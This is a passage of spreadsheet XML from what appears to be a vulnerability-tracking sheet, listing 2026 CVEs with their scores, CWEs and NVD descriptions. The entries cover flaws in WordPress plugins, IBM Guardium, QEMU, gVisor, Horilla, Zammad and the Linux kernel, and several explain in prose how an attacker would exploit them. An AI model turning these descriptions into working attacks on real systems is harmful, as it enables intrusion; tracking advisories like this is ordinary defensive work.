        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Request Forgery (CSRF) vulnerability in Elementor Website Builder allows Cross Site Request Forgery.
This issue affects Elementor Website Builder: from n/a through 4.3.1.</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62062</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85542</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>IBM Guardium Data Protection 12.2 is affected by a command injection vulnerability in the GIM bundle import functionality. An authenticated attacker can provide a crafted GIM bundle that causes attacker-controlled arguments to be passed to the tar command, resulting in arbitrary command execution with elevated privileges on the Central Manager.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85542</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89426</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>The Knit Pay – Cashfree, Instamojo, Razorpay, PayPal and more plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 9.6.1.0. This is due to the `maybe_update_user_role()` function reading the target role directly from an attacker-controlled Gravity Forms entry field — configured via the feed's `user_role_field_id` — and passing it to `WP_User::set_role()` without validating the supplied value against an allowlist of permitted roles. This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to administrator by tampering with the hidden role field value at form submission time. Exploitation is further enabled by the fact that $0 orders are synchronously marked as SUCCESS during form submission without requiring a real payment, and when no GF User Registration user can be resolved, the role assignment target falls back to `$lead['created_by']` — the currently authenticated submitter's own user ID — making any authenticated form submitter an eligible exploitation target.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89426</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93834</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>A use-after-free vulnerability was found in QEMU's 9pfs subsystem. A race condition between the main thread and a worker thread when processing concurrent Tlcreate and Twalk requests allows a malicious guest user to craft a fid path containing stale heap data, bypassing directory traversal restrictions and escaping the shared directory boundary. This can lead to arbitrary host file read/write and code execution (VM escape) as the QEMU process user.</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93834</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94445</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>go, golang, rust</t>
        </is>
      </c>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>A malicious txtar could escape the intended execution context and force arbitrary writes to the playground host's trusted filesystem.
Disjointly, one of the three possible paths to invoke go vet on the playground host did not correctly restrict the execution environment. This permitted a Go process to make a read for an environment configuration file rooted in the playground host's $HOME.
Together, a well-crafted go env file and the go vet invocation could lead to remote code execution in the playground host itself.
This does not affect users of go.dev/play directly; however, it may affect independent deployments of golang.org/x/playground.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94445</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96795</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr">
        <is>
          <t>docker, python</t>
        </is>
      </c>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>Horilla is an HR and CRM software. Prior to 2.0.0, HorillaListView.export_data in horilla_views/generic/cbv/views.py accepts an authenticated user's columns POST parameter, takes field_tuple[1], interpolates it into dynamic_fn_str as Python source, and passes the generated function definition to exec(). A crafted string that remains valid under ast.literal_eval can inject Python syntax into a default argument evaluated during function definition, allowing arbitrary operating-system commands to execute with the application process privileges, including root privileges in the shipped Docker image. This issue is fixed in version 2.0.0.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96795</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96812</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@google.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-668</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>Improper Exposure of Resource to Wrong Sphere in the host file helper (gofer) in Google gVisor prior to commit 573a9e73cf844f on Linux platforms with CUSE enabled allows a local attacker with container image deployment privileges to achieve root code execution on the host system. By including a /dev/cuse character device node in a container image, opening the device passes through to the host, allowing the sandboxed attacker to register a host device and exploit CUSE unrestricted ioctl handling to overwrite root udev helper memory.</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96812</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97527</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr"/>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Serialize NVMe unsol ctx list with a per-fcport lock
The fcport-&gt;unsol_ctx_head list is modified from several contexts without
a common lock. Entries are added in qla2xxx_process_purls_iocb() from the
response queue ISR (under the qpair qp_lock), while they are removed from
qla2xxx_process_purls_pkt() (DPC/purex worker), qla_nvme_xmt_ls_rsp()
(NVMe-FC transport callback) and qla_nvme_release_lsrsp_cmd_kref() (SRB
completion). The qpair qp_lock cannot serialize this per-fcport list since
multiqueue adapters add entries through different qpairs, so a concurrent
add and delete (or two concurrent deletes) can corrupt the list pointers.
Introduce a dedicated per-fcport spinlock, unsol_ctx_lock, initialized in
qla2x00_alloc_fcport(), and take it around every list_add_tail()/list_del()
on unsol_ctx_head. The add nests under the existing qp_lock; no delete path
takes qp_lock, so the lock order is consistent and deadlock free.</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97527</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97528</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr"/>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Unlink NVMe unsol ctx before freeing on LS reject error
qla_nvme_xmt_ls_rsp() obtains uctx, which was linked into
fcport-&gt;unsol_ctx_head by qla2xxx_process_purls_iocb() and is still linked
when the NVMe transport calls back to transmit the LS response. On the
error (out:) path the function frees uctx with kfree() but never removes
it from the list. This leaves a freed node in fcport-&gt;unsol_ctx_head: the
next list_add_tail() for that fcport writes through the freed node, and a
subsequent list_del() can corrupt the list or panic.
Unlink uctx with list_del() before kfree() on the error path, matching the
other free sites in qla_nvme_release_lsrsp_cmd_kref() and
qla2xxx_process_purls_pkt(). qla2x00_rel_sp() in the failure path only
returns the SRB to its pool and does not invoke sp-&gt;put_fn, so the out:
path is the sole free and uctx is always still linked there.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97528</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97555</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr"/>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix heap overflow in DACL owner/group rewrite
When id_mode_to_cifs_acl rewrites an existing DACL, it allocates a
buffer sized according to the on-disk DACL length reported by
dacl_ptr-&gt;size. However, replace_sids_and_copy_aces may rewrite each
ACE with a new owner/group SID obtained from the cifs.idmap upcall.
Those SIDs can have up to SID_MAX_SUB_AUTHORITIES (15) sub-authorities,
making each ACE up to 76 bytes (sizeof(struct smb_ace)).
If the original DACL contains short SIDs (e.g., 1 sub-authority) while
the replacement SIDs are long, the rewritten ACEs overflow the
allocation.
Fix this by always budgeting for worst-case SID expansion: allocate
sizeof(struct smb_acl) plus num_aces * sizeof(struct smb_ace), which
covers the smb_acl header and room for every ACE at maximum SID size.
This replaces the previous split logic that used dacl_ptr-&gt;size for
cifsacl mounts but num_aces * sizeof(struct smb_ace) for mode_from_sid
mounts: both paths can trigger the same rewrite and need the same
headroom.
KASAN reports this as:
  BUG: KASAN: slab-out-of-bounds in build_sec_desc+0x1e8a/0x2680 [cifs]
  Write of size 4 at addr ffff8881a5e25374 by task chown/5298
  ...
  The buggy address is located 0 bytes to the right of
   allocated 884-byte region [ffff8881a5e25000, ffff8881a5e25374)</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97555</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97957</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr"/>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr"/>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: hinic: fix mailbox segment buffer overflow
check_mbox_seq_id_and_seg_len() validates that seq_id does not
exceed SEQ_ID_MAX_VAL (42) and seg_len does not exceed
MBOX_SEG_LEN (48).  However, this allows the last segment
(seq_id=42) to carry a full 48-byte payload, writing to offset
42*48=2016 for 48 bytes (ending at byte 2064).  The receive
buffer is only MBOX_MAX_BUF_SZ (2048) bytes, resulting in a
16-byte heap buffer overflow.
The hinic3 driver already handles this correctly by defining
MBOX_LAST_SEG_MAX_LEN and rejecting the last segment when it
exceeds the remaining buffer space.  Apply the same fix to the
hinic driver.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97957</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98115</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr">
        <is>
          <t>requests, go</t>
        </is>
      </c>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr"/>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: safely drain sessions during logoff
SMB3 multichannel allows requests for one session to run on multiple
connections. Wait for all channels bound to a session before freeing
shared session objects.
A deferred byte-range lock remains counted as a running request and only
wakes when its file closes. Wake blocked locks during the drain without
unpublishing or modifying their file objects. Synchronous CANCEL requests
must invoke their cancellation callback to wake pending operations, while
CHANGE_NOTIFY completion remains specific to the asynchronous path.
Serialize session teardown with channel registration and previous-session
cleanup, and use atomic work-state transitions so LOGOFF, CANCEL, and
connection teardown invoke cancellation callbacks only once.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98115</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56725</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-400</t>
        </is>
      </c>
      <c r="S45" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, summary An unauthenticated request to POST /api/v1/import/otrs/import_check blocks a Zammad request worker for roughly two minutes. The import_check and import_status actions are missing the setup_done_response guard that other actions in the same controller carry, so they execute on fully set-up production instances. The action enters a retry loop against a blank OTRS endpoint, sleeping for 30 s + 45 s between attempts. Impact An unauthenticated remote attacker denies service to a production Zammad instance. Each request costs almost nothing and forces ~115 seconds of server-side blocking. A few requests per second saturate the Puma worker pool. The condition persists as long as the traffic continues. No account, valid import configuration, or target knowledge beyond the hostname is needed. CSRF token is trivially obtained from any prior GET response. This issue is fixed in version 7.0.2.</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56725</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56733</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-863</t>
        </is>
      </c>
      <c r="S46" s="5" t="inlineStr">
        <is>
